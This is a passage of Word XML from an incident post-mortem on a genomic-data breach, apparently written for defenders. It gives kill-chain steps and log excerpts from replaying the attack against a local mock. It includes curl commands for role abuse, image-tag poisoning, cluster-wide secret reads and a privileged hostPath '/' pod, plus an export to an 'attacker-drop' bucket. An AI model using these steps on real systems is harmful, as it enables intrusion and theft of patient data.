        <w:t>Pod 16 Nov 04:12 (F14); no admission control → node owned. Alert 04:22 (F20) closed 'expected' against 90–140 legit privileged pods/day (F21) — hostPath / missed. Proto: k8s/create-pod + soc/triage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 8 — Hop 2 with zero matching runs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tool: </w:t>
      </w:r>
      <w:r>
        <w:t>aws sts assume-role (PipelineOps→DataExport)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Details: </w:t>
      </w:r>
      <w:r>
        <w:t>41 assumes 17 Nov–9 Jan vs 1,100 prior, all 1:1 with runs (F16). Broken invariant nobody charts; no runbook covers chains (F23). Proto: second assume-chain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 9 — Bulk-read the archive; alert #2 mis-closed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tool: </w:t>
      </w:r>
      <w:r>
        <w:t>s3 get-object loop / export invokes (legit path, abusive volume)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Details: </w:t>
      </w:r>
      <w:r>
        <w:t>31k reads 19 Nov–6 Jan vs ~2.4k/mo (F18); LIS 4,900 deliveries (F19) → ~26k unjustified. Alert 19 Nov (F22) closed 'month-end batch' without LIS access. Count matches dump. Proto: chunked export/read.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 10 — Exfil via unscoped destination</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tool: </w:t>
      </w:r>
      <w:r>
        <w:t>export invoke with destination=s3://attacker-drop/…</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Details: </w:t>
      </w:r>
      <w:r>
        <w:t>DataExport writes wherever the parameter says (F17); reads end 6 Jan (F31) = data leaves Helix. No policy/log/bucket/key signal (F24) — feature used as designed, pointed elsewhere. Proto: export/deliver.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 11 — Stage, dump, get spotted by luck</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tool: </w:t>
      </w:r>
      <w:r>
        <w:t>(attacker-side) upload via commercial hosting IP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Details: </w:t>
      </w:r>
      <w:r>
        <w:t>Repo account 4 Jan, upload 11 Jan — 5 days after reads end, implying staging (F30). Internal IDs survive; outsider recognises format 18 Jan. Dec login spray (F29) is unrelated noise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>7. Mock prototype + hack simulation — how we proved it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.1 What the mock is (and isn't)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>prototype/app.py is a single-file, dependency-free Python server (~450 lines) that reimplements the estate's security-relevant logic with dummy data: wildcard trust matching, role chaining, mutable tags, K8s RBAC + automount + admission toggle, export allow-list toggle, and SOC alerts. prototype/attacker.py replays the kill-chain against it over HTTP. Dummy genomes (HELIX-SMP-xxxxxx) stand in for real sequences; counters simulate the 31k/4.9k volumes. Nothing touches real cloud, GitHub, or K8s — but every allow/deny decision uses the same rule the real system used.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Real thing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Mock endpoint(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Vuln logic reproduced</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>GitHub PR + OIDC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>POST /api/github/pr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>pull_request_target pre-review + sub claim (F3/F4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HelixDeploy trust</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>POST /api/iam/assume-deploy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Wildcard * match (F5); pinned in FIXED mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Runner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>POST /api/runner/exec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Persistence outside /work (F8)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Role chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>POST /api/iam/assume-chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Deploy→Ops→Export hops (F25/F26)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Registry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>POST /api/registry/push</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Mutable tag, pull-by-tag (F9); frozen in FIXED</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>K8s RBAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>POST /api/k8s/list-secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Binding × automount (F12/F13)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>K8s admission</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>POST /api/k8s/create-pod</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No-op (F14); Kyverno-deny in FIXED</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Export</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>POST /api/export/read|deliver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Bulk read + any-destination write (F17/F18)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>POST /api/soc/triage; GET /api/alerts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Both alerts fire; triage replays mis-closure (F20–F22)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.2 Replay results (vulnerable mode)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>Ran 24 Sep 2026 on this machine (PORT 8471). Every exploit step ALLOWED; both SOC alerts fired and were triaged exactly as in the real incident. Excerpts below; full log: prototype/data/simulation.log; machine-readable audit: prototype/data/audit.log.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>STEP 2: Assume HelixDeploy via org-wide wildcard trust (F5)</w:t>
        <w:br/>
        <w:t>======================================================================</w:t>
        <w:br/>
        <w:t>$ curl -X POST $URL/api/iam/assume-deploy -d '{"oidc_sub":"repo:helix...:pull_request"}'</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "allowed": true,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "cred_id": "cred-cd9086cb1df2",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "role": "HelixDeploy",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "why": "wildcard trust 'repo:helix-diagnostics/*' accepted low-trust repo token (F5)"</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>--&gt; Got HelixDeploy creds: cred-cd9086cb1df2</w:t>
        <w:br/>
        <w:br/>
        <w:t>======================================================================</w:t>
        <w:br/>
        <w:t>STEP 3: Execution on shared self-hosted runner + persistence outside /work (F7/F8)</w:t>
        <w:br/>
        <w:t>======================================================================</w:t>
        <w:br/>
        <w:t>$ curl -X POST $URL/api/runner/exec -d '{"cmd":"...","persist_path":"/opt/runner-env/.cache"}'</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "executed_on": "self-hosted runner vm-2 (helix-build)",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "cmd": "stage2: steal creds, prep registry push",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "ts": "2026-09-24T16:57:44Z",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "persisted": true,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "warning": "/opt/runner-env/.x is OUTSIDE /work -&gt; survives job cleanup, infects future legitimate builds (F8)"</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>--&gt; No runtime telemetry (F15): nobody can say what else ran. Permanent blind spot.</w:t>
        <w:br/>
        <w:br/>
        <w:t>======================================================================</w:t>
        <w:br/>
        <w:t>STEP 4: Chain HelixDeploy -&gt; HelixPipelineOps (hop 1, never reviewed end-to-end F25/F26)</w:t>
        <w:br/>
        <w:t>======================================================================</w:t>
        <w:br/>
        <w:t>$ curl -X POST $URL/api/iam/assume-chain -d '{"</w:t>
        <w:br/>
        <w:br/>
        <w:t>...</w:t>
        <w:br/>
        <w:br/>
        <w:t>STEP 5: Supply-chain poisoning — push evil image to mutable 'stable' tag (F9/F10)</w:t>
        <w:br/>
        <w:t>======================================================================</w:t>
        <w:br/>
        <w:t>$ curl -X POST $URL/api/registry/push -d '{"cred_id":"...","tag":"stable"}'</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "allowed": true,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "pushed": {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "tag": "stable",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "digest": "sha256:evil9f224a",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "pushed_by": "HelixPipelineOps (attacker-chained)",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "ts": "2026-09-24T16:57:44Z"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "impact": "Every future pipeline pulling 'stable' by TAG now gets attacker image with zero config change (F9)."</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>--&gt; Pipelines pull by TAG not digest: poison becomes 'current base image' silently.</w:t>
        <w:br/>
        <w:br/>
        <w:t>======================================================================</w:t>
        <w:br/>
        <w:t>STEP 6: Escalation in helix-prod — poisoned pod reads ALL secrets via stale binding (F12/F13/F11)</w:t>
        <w:br/>
        <w:t>======================================================================</w:t>
        <w:br/>
        <w:t>$ curl -X POST $URL/api/k8s/list-secrets -d '{"sa":"pipeline-runner"}'</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "allowed": true,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "secrets": [</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "namespace": "pipeline",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "name": "db-creds",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "value": "DUMMY-db-pass-****"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "namespace": "pipeline",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "name": "registry-creds",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "value": "DUMMY-reg-token-****"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "namespace": "kube-system",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "name": "cloud-key",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "value": "DUMMY-cloud-****"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "namespace": "export",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "name": "lis-api-key",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "value": "DUMMY-lis-****"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
        <w:br/>
        <w:t xml:space="preserve"> </w:t>
        <w:br/>
        <w:br/>
        <w:t>...</w:t>
        <w:br/>
        <w:br/>
        <w:t>STEP 6: Escalation in helix-prod — poisoned pod reads ALL secrets via stale binding (F12/F13/F11)</w:t>
        <w:br/>
        <w:t>======================================================================</w:t>
        <w:br/>
        <w:t>$ curl -X POST $URL/api/k8s/list-secrets -d '{"sa":"pipeline-runner"}'</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "allowed": true,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "secrets": [</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "namespace": "pipeline",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "name": "db-creds",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "value": "DUMMY-db-pass-****"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "namespace": "pipeline",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "name": "registry-creds",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "value": "DUMMY-reg-token-****"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "namespace": "kube-system",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "name": "cloud-key",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "value": "DUMMY-cloud-****"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "namespace": "export",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "name": "lis-api-key",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "value": "DUMMY-lis-****"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "namespace": "default",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "name": "tls-cert",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "value": "DUMMY-tls-****"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ],</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "why": "pipeline-reader (get/list secrets cluster-wide) still bound to system:authenticated (F12) + every pod automounts token (F13).",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "secret_access_count": 5,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "compare_real": "real incident: 14,000 get/list ops 15-22 Nov (F11)"</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>======================================================================</w:t>
        <w:br/>
        <w:t>STEP 7: Node breakout — privileged + hostPath '/' pod, no admission control (F14). Alert F20 fires.</w:t>
        <w:br/>
        <w:t>======================================================================</w:t>
        <w:br/>
        <w:t>$ curl -X POST $URL/api/k8s/create-pod -d '{"spec":{"privileged":true,"hostPath":"/"}}'</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "allowed": tru</w:t>
        <w:br/>
        <w:br/>
        <w:t>...</w:t>
        <w:br/>
        <w:br/>
        <w:t>STEP 7: Node breakout — privileged + hostPath '/' pod, no admission control (F14). Alert F20 fires.</w:t>
        <w:br/>
        <w:t>======================================================================</w:t>
        <w:br/>
        <w:t>$ curl -X POST $URL/api/k8s/create-pod -d '{"spec":{"privileged":true,"hostPath":"/"}}'</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "allowed": true,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "pod": {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "name": "seq-pipeline-gpu-helper",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "namespace": "pipeline",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "sa": "pipeline-runner",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "image": "sha256:evil9f224a",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "privileged": true,</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "hostPath": "/",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "ts": "2026-09-24T16:57:44Z"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "alert": {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "id": "ALT-001",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "type": "privileged-pod",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "detail": "pod seq-pipeline-gpu-helper requests hostPath '/' + privileged",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "ts": "2026-09-24T16:57:44Z",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "status": "OPEN",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "real_ref": "F20 fired 16 Nov 04:22; closed wrongly as expected (F21 base-rate failure)"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "impact": "No admission control (F14): container-to-node breakout. Attacker owns the node."</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>--&gt; SOC alert ALT-001 fires. Analyst closes as 'expected' (90-140 privileged pods/day, F21) without spotting hostPath='/'.</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "triaged": {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "id": "ALT-001",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "type": "privileged-pod",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "detail": "pod seq-pipeline-gpu-helper requests hostPath '/' + privileged",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "ts": "2026-09-24T16:57:44Z",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "status": "CLOSED: expected behaviour (privileged is normal)",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "real_ref": "F20 fired 16 Nov 04:22; closed wrongly as expected (F21 base-rate failure)"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "lesson": "Both real alerts f</w:t>
        <w:br/>
        <w:br/>
        <w:t>...</w:t>
        <w:br/>
        <w:br/>
        <w:t>STEP 9: Bulk read of helix-sequences — 31k vs ~2.4k/mo baseline (F18). Alert F22 fires.</w:t>
        <w:br/>
        <w:t>======================================================================</w:t>
        <w:br/>
        <w:t>$ curl -X POST $URL/api/export/read -d '{"cred_id":"...","count":31000}'</w:t>
        <w:br/>
        <w:t xml:space="preserve">  read chunk 8000: total=8000</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --&gt; SOC alert ALT-002 fired on bulk read.</w:t>
        <w:br/>
        <w:t xml:space="preserve">  read chunk 8000: total=16000</w:t>
        <w:br/>
        <w:t xml:space="preserve">  read chunk 8000: total=24000</w:t>
        <w:br/>
        <w:t xml:space="preserve">  read chunk 7000: total=31000</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "allowed": true,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "read": 7000,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "total_read": 31000,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "sample": [</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "sample_id": "HELIX-SMP-000001",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "patient_ref": "PT-100001",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "hospital": "hospital-group-02",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "sequence_hash": "7b84703768914fa9",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "size_kb": 4201</w:t>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "sample_id": "HELIX-SMP-000002",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "patient_ref": "PT-100002",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "hospital": "hospital-group-03",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "sequence_hash": "9936052c569c3cc0",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "size_kb": 4202</w:t>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "sample_id": "HELIX-SMP-000003",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "patient_ref": "PT-100003",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "hospital": "hospital-group-04",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "sequence_hash": "ff83cf95447ec416",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "size_kb": 4203</w:t>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "sample_id": "HELIX-SMP-000004",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "patient_ref": "PT-100004",</w:t>
